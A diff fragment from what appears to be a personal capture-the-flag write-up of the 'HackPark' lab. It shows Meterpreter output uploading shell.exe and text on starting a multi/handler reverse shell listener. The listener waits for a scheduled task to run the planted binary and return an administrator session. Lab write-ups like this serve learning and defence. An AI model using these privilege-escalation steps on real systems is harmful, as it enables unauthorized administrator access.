bharathkarumudi/bharathkarumudi.github.io/5_HackPark.md

     [*] uploaded   : shell.exe -> shell.exe
     meterpreter > dir

-Background the current Meterpreter session and run the multi/handler again to wait for new session to be established.
+Background the current Meterpreter session and start a new `multi/handler`  reverse shell listener.
+Wait for the scheduler to execute the malicious code and once executed, a new connection is established with administrator id.

     meterpreter > background
     [*] Backgrounding session 2...